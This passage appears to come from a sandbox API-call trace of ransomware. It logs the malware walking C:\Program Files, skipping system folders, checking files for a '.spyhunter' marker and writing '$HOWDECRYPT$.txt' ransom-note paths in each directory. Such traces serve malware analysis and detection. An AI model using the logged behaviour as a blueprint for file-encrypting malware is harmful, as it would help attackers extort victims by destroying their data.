Information") returned 25 [0092.076] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 58 [0092.076] StrStrIW (lpFirst="msdaps.dll", lpSrch=".spyhunter") returned 0x0 [0092.076] lstrcmpW (lpString1="msdaps.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.076] lstrcmpW (lpString1="msdaps.dll", lpString2="_uninstalling_.png") returned 1 [0092.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 58 [0092.077] GetProcessHeap () returned 0x2c0000 [0092.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb6) returned 0x34c8d8 [0092.077] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0092.077] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.077] lstrcmpiW (lpString1="msdasql.dll", lpString2="Windows") returned -1 [0092.077] lstrlenW (lpString="Windows") returned 7 [0092.077] lstrcmpiW (lpString1="msdasql.dll", lpString2="$Recycle.bin") returned 1 [0092.077] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.077] lstrcmpiW (lpString1="msdasql.dll", lpString2="System Volume Information") returned -1 [0092.077] lstrlenW (lpString="System Volume Information") returned 25 [0092.077] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 59 [0092.077] StrStrIW (lpFirst="msdasql.dll", lpSrch=".spyhunter") returned 0x0 [0092.077] lstrcmpW (lpString1="msdasql.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.077] lstrcmpW (lpString1="msdasql.dll", lpString2="_uninstalling_.png") returned 1 [0092.077] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 59 [0092.077] GetProcessHeap () returned 0x2c0000 [0092.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34c998 [0092.077] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0092.077] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.077] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="Windows") returned -1 [0092.077] lstrlenW (lpString="Windows") returned 7 [0092.077] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="$Recycle.bin") returned 1 [0092.077] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.078] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="System Volume Information") returned -1 [0092.078] lstrlenW (lpString="System Volume Information") returned 25 [0092.078] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned 60 [0092.078] StrStrIW (lpFirst="msdasqlr.dll", lpSrch=".spyhunter") returned 0x0 [0092.078] lstrcmpW (lpString1="msdasqlr.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.078] lstrcmpW (lpString1="msdasqlr.dll", lpString2="_uninstalling_.png") returned 1 [0092.078] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned 60 [0092.078] GetProcessHeap () returned 0x2c0000 [0092.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xba) returned 0x32d5b8 [0092.078] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0092.078] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.078] lstrcmpiW (lpString1="msdatl3.dll", lpString2="Windows") returned -1 [0092.078] lstrlenW (lpString="Windows") returned 7 [0092.078] lstrcmpiW (lpString1="msdatl3.dll", lpString2="$Recycle.bin") returned 1 [0092.078] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.078] lstrcmpiW (lpString1="msdatl3.dll", lpString2="System Volume Information") returned -1 [0092.078] lstrlenW (lpString="System Volume Information") returned 25 [0092.078] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll") returned 59 [0092.078] StrStrIW (lpFirst="msdatl3.dll", lpSrch=".spyhunter") returned 0x0 [0092.078] lstrcmpW (lpString1="msdatl3.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.078] lstrcmpW (lpString1="msdatl3.dll", lpString2="_uninstalling_.png") returned 1 [0092.078] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll") returned 59 [0092.078] GetProcessHeap () returned 0x2c0000 [0092.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34ca58 [0092.079] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0092.079] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.079] lstrcmpiW (lpString1="msxactps.dll", lpString2="Windows") returned -1 [0092.079] lstrlenW (lpString="Windows") returned 7 [0092.079] lstrcmpiW (lpString1="msxactps.dll", lpString2="$Recycle.bin") returned 1 [0092.079] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.079] lstrcmpiW (lpString1="msxactps.dll", lpString2="System Volume Information") returned -1 [0092.079] lstrlenW (lpString="System Volume Information") returned 25 [0092.079] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 60 [0092.079] StrStrIW (lpFirst="msxactps.dll", lpSrch=".spyhunter") returned 0x0 [0092.079] lstrcmpW (lpString1="msxactps.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.079] lstrcmpW (lpString1="msxactps.dll", lpString2="_uninstalling_.png") returned 1 [0092.079] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 60 [0092.079] GetProcessHeap () returned 0x2c0000 [0092.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xba) returned 0x32d748 [0092.079] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0092.079] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.079] lstrcmpiW (lpString1="oledb32.dll", lpString2="Windows") returned -1 [0092.079] lstrlenW (lpString="Windows") returned 7 [0092.079] lstrcmpiW (lpString1="oledb32.dll", lpString2="$Recycle.bin") returned 1 [0092.079] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.080] lstrcmpiW (lpString1="oledb32.dll", lpString2="System Volume Information") returned -1 [0092.080] lstrlenW (lpString="System Volume Information") returned 25 [0092.080] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll") returned 59 [0092.080] StrStrIW (lpFirst="oledb32.dll", lpSrch=".spyhunter") returned 0x0 [0092.080] lstrcmpW (lpString1="oledb32.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.080] lstrcmpW (lpString1="oledb32.dll", lpString2="_uninstalling_.png") returned 1 [0092.080] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll") returned 59 [0092.080] GetProcessHeap () returned 0x2c0000 [0092.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34cf98 [0092.080] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0092.080] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.080] lstrcmpiW (lpString1="oledb32r.dll", lpString2="Windows") returned -1 [0092.080] lstrlenW (lpString="Windows") returned 7 [0092.080] lstrcmpiW (lpString1="oledb32r.dll", lpString2="$Recycle.bin") returned 1 [0092.080] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.080] lstrcmpiW (lpString1="oledb32r.dll", lpString2="System Volume Information") returned -1 [0092.080] lstrlenW (lpString="System Volume Information") returned 25 [0092.080] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll") returned 60 [0092.080] StrStrIW (lpFirst="oledb32r.dll", lpSrch=".spyhunter") returned 0x0 [0092.080] lstrcmpW (lpString1="oledb32r.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.080] lstrcmpW (lpString1="oledb32r.dll", lpString2="_uninstalling_.png") returned 1 [0092.080] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll") returned 60 [0092.080] GetProcessHeap () returned 0x2c0000 [0092.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xba) returned 0x32d680 [0092.081] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0092.081] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.081] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="Windows") returned -1 [0092.081] lstrlenW (lpString="Windows") returned 7 [0092.081] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="$Recycle.bin") returned 1 [0092.081] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.081] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="System Volume Information") returned -1 [0092.081] lstrlenW (lpString="System Volume Information") returned 25 [0092.081] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 60 [0092.081] StrStrIW (lpFirst="oledbjvs.inc", lpSrch=".spyhunter") returned 0x0 [0092.081] lstrcmpW (lpString1="oledbjvs.inc", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.081] lstrcmpW (lpString1="oledbjvs.inc", lpString2="_uninstalling_.png") returned 1 [0092.081] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 60 [0092.081] GetProcessHeap () returned 0x2c0000 [0092.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xba) returned 0x32d4f0 [0092.081] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0092.081] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.081] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="Windows") returned -1 [0092.081] lstrlenW (lpString="Windows") returned 7 [0092.081] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="$Recycle.bin") returned 1 [0092.081] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.081] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="System Volume Information") returned -1 [0092.081] lstrlenW (lpString="System Volume Information") returned 25 [0092.081] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 60 [0092.082] StrStrIW (lpFirst="oledbvbs.inc", lpSrch=".spyhunter") returned 0x0 [0092.082] lstrcmpW (lpString1="oledbvbs.inc", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.082] lstrcmpW (lpString1="oledbvbs.inc", lpString2="_uninstalling_.png") returned 1 [0092.082] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 60 [0092.082] GetProcessHeap () returned 0x2c0000 [0092.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xba) returned 0x32d810 [0092.082] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b0) returned 0x2c310e0 [0092.082] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.082] lstrcmpiW (lpString1="sqloledb.dll", lpString2="Windows") returned -1 [0092.082] lstrlenW (lpString="Windows") returned 7 [0092.082] lstrcmpiW (lpString1="sqloledb.dll", lpString2="$Recycle.bin") returned 1 [0092.082] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.082] lstrcmpiW (lpString1="sqloledb.dll", lpString2="System Volume Information") returned -1 [0092.082] lstrlenW (lpString="System Volume Information") returned 25 [0092.082] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll") returned 60 [0092.082] StrStrIW (lpFirst="sqloledb.dll", lpSrch=".spyhunter") returned 0x0 [0092.082] lstrcmpW (lpString1="sqloledb.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.082] lstrcmpW (lpString1="sqloledb.dll", lpString2="_uninstalling_.png") returned 1 [0092.082] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll") returned 60 [0092.082] GetProcessHeap () returned 0x2c0000 [0092.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xba) returned 0x32d8d8 [0092.082] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0092.082] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.083] lstrcmpiW (lpString1="sqloledb.rll", lpString2="Windows") returned -1 [0092.083] lstrlenW (lpString="Windows") returned 7 [0092.083] lstrcmpiW (lpString1="sqloledb.rll", lpString2="$Recycle.bin") returned 1 [0092.083] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.083] lstrcmpiW (lpString1="sqloledb.rll", lpString2="System Volume Information") returned -1 [0092.083] lstrlenW (lpString="System Volume Information") returned 25 [0092.083] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned 60 [0092.083] StrStrIW (lpFirst="sqloledb.rll", lpSrch=".spyhunter") returned 0x0 [0092.083] lstrcmpW (lpString1="sqloledb.rll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.083] lstrcmpW (lpString1="sqloledb.rll", lpString2="_uninstalling_.png") returned 1 [0092.083] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned 60 [0092.083] GetProcessHeap () returned 0x2c0000 [0092.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xba) returned 0x32d9a0 [0092.083] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0092.083] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.083] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="Windows") returned -1 [0092.083] lstrlenW (lpString="Windows") returned 7 [0092.083] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="$Recycle.bin") returned 1 [0092.083] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.083] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="System Volume Information") returned -1 [0092.083] lstrlenW (lpString="System Volume Information") returned 25 [0092.083] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned 59 [0092.083] StrStrIW (lpFirst="sqlxmlx.dll", lpSrch=".spyhunter") returned 0x0 [0092.083] lstrcmpW (lpString1="sqlxmlx.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.084] lstrcmpW (lpString1="sqlxmlx.dll", lpString2="_uninstalling_.png") returned 1 [0092.084] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned 59 [0092.084] GetProcessHeap () returned 0x2c0000 [0092.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34cb18 [0092.084] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0092.084] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.084] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="Windows") returned -1 [0092.084] lstrlenW (lpString="Windows") returned 7 [0092.084] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="$Recycle.bin") returned 1 [0092.084] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.084] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="System Volume Information") returned -1 [0092.084] lstrlenW (lpString="System Volume Information") returned 25 [0092.084] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned 59 [0092.084] StrStrIW (lpFirst="sqlxmlx.rll", lpSrch=".spyhunter") returned 0x0 [0092.084] lstrcmpW (lpString1="sqlxmlx.rll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.084] lstrcmpW (lpString1="sqlxmlx.rll", lpString2="_uninstalling_.png") returned 1 [0092.084] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned 59 [0092.084] GetProcessHeap () returned 0x2c0000 [0092.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34cbd8 [0092.085] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0092.085] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.085] lstrcmpiW (lpString1="xmlrw.dll", lpString2="Windows") returned 1 [0092.085] lstrlenW (lpString="Windows") returned 7 [0092.085] lstrcmpiW (lpString1="xmlrw.dll", lpString2="$Recycle.bin") returned 1 [0092.085] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.085] lstrcmpiW (lpString1="xmlrw.dll", lpString2="System Volume Information") returned 1 [0092.085] lstrlenW (lpString="System Volume Information") returned 25 [0092.085] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll") returned 57 [0092.085] StrStrIW (lpFirst="xmlrw.dll", lpSrch=".spyhunter") returned 0x0 [0092.085] lstrcmpW (lpString1="xmlrw.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.085] lstrcmpW (lpString1="xmlrw.dll", lpString2="_uninstalling_.png") returned 1 [0092.085] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll") returned 57 [0092.085] GetProcessHeap () returned 0x2c0000 [0092.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34cc98 [0092.085] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0092.085] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.085] lstrcmpiW (lpString1="xmlrwbin.dll", lpString2="Windows") returned 1 [0092.085] lstrlenW (lpString="Windows") returned 7 [0092.085] lstrcmpiW (lpString1="xmlrwbin.dll", lpString2="$Recycle.bin") returned 1 [0092.085] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.085] lstrcmpiW (lpString1="xmlrwbin.dll", lpString2="System Volume Information") returned 1 [0092.086] lstrlenW (lpString="System Volume Information") returned 25 [0092.086] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned 60 [0092.086] StrStrIW (lpFirst="xmlrwbin.dll", lpSrch=".spyhunter") returned 0x0 [0092.086] lstrcmpW (lpString1="xmlrwbin.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.086] lstrcmpW (lpString1="xmlrwbin.dll", lpString2="_uninstalling_.png") returned 1 [0092.086] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned 60 [0092.086] GetProcessHeap () returned 0x2c0000 [0092.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xba) returned 0x32da68 [0092.086] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0092.086] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0092.086] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0092.086] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\$HOWDECRYPT$.txt") returned 64 [0092.086] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\$HOWDECRYPT$.txt") returned 64 [0092.086] GetProcessHeap () returned 0x2c0000 [0092.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc2) returned 0x358d60 [0092.086] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0092.087] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0092.088] lstrcmpiW (lpString1="wab32.dll", lpString2="Windows") returned -1 [0092.088] lstrlenW (lpString="Windows") returned 7 [0092.088] lstrcmpiW (lpString1="wab32.dll", lpString2="$Recycle.bin") returned 1 [0092.088] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.088] lstrcmpiW (lpString1="wab32.dll", lpString2="System Volume Information") returned 1 [0092.088] lstrlenW (lpString="System Volume Information") returned 25 [0092.088] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll") returned 50 [0092.088] StrStrIW (lpFirst="wab32.dll", lpSrch=".spyhunter") returned 0x0 [0092.088] lstrcmpW (lpString1="wab32.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.088] lstrcmpW (lpString1="wab32.dll", lpString2="_uninstalling_.png") returned 1 [0092.088] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll") returned 50 [0092.088] GetProcessHeap () returned 0x2c0000 [0092.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa6) returned 0x33d000 [0092.088] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0092.088] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0092.088] lstrcmpiW (lpString1="wab32res.dll", lpString2="Windows") returned -1 [0092.088] lstrlenW (lpString="Windows") returned 7 [0092.088] lstrcmpiW (lpString1="wab32res.dll", lpString2="$Recycle.bin") returned 1 [0092.088] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.088] lstrcmpiW (lpString1="wab32res.dll", lpString2="System Volume Information") returned 1 [0092.088] lstrlenW (lpString="System Volume Information") returned 25 [0092.088] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll") returned 53 [0092.088] StrStrIW (lpFirst="wab32res.dll", lpSrch=".spyhunter") returned 0x0 [0092.088] lstrcmpW (lpString1="wab32res.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.089] lstrcmpW (lpString1="wab32res.dll", lpString2="_uninstalling_.png") returned 1 [0092.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll") returned 53 [0092.089] GetProcessHeap () returned 0x2c0000 [0092.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xac) returned 0x329f48 [0092.089] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0092.089] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0092.089] FindClose (in: hFindFile=0x335f20 | out: hFindFile=0x335f20) returned 1 [0092.089] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\$HOWDECRYPT$.txt") returned 57 [0092.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\$HOWDECRYPT$.txt") returned 57 [0092.089] GetProcessHeap () returned 0x2c0000 [0092.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34cd58 [0092.089] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0092.089] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0092.089] FindClose (in: hFindFile=0x335ee0 | out: hFindFile=0x335ee0) returned 1 [0092.089] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\$HOWDECRYPT$.txt") returned 50 [0092.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\$HOWDECRYPT$.txt") returned 50 [0092.090] GetProcessHeap () returned 0x2c0000 [0092.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa6) returned 0x33d160 [0092.090] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1608) returned 0x2c310e0 [0092.090] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0092.090] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0092.090] lstrlenW (lpString="Windows") returned 7 [0092.090] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0092.090] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.090] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0092.091] lstrlenW (lpString="System Volume Information") returned 25 [0092.091] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\desktop.ini") returned 32 [0092.091] StrStrIW (lpFirst="desktop.ini", lpSrch=".spyhunter") returned 0x0 [0092.091] lstrcmpW (lpString1="desktop.ini", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.091] lstrcmpW (lpString1="desktop.ini", lpString2="_uninstalling_.png") returned 1 [0092.091] lstrlenW (lpString="\\\\?\\C:\\Program Files\\desktop.ini") returned 32 [0092.091] GetProcessHeap () returned 0x2c0000 [0092.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x82) returned 0x30e4a8 [0092.091] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1610) returned 0x2c310e0 [0092.091] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0092.091] lstrcmpiW (lpString1="DVD Maker", lpString2="Windows") returned -1 [0092.091] lstrlenW (lpString="Windows") returned 7 [0092.091] lstrcmpiW (lpString1="DVD Maker", lpString2="$Recycle.bin") returned 1 [0092.091] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.091] lstrcmpiW (lpString1="DVD Maker", lpString2="System Volume Information") returned -1 [0092.091] lstrlenW (lpString="System Volume Information") returned 25 [0092.091] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker") returned 30 [0092.091] lstrcmpW (lpString1="DVD Maker", lpString2=".") returned 1 [0092.091] 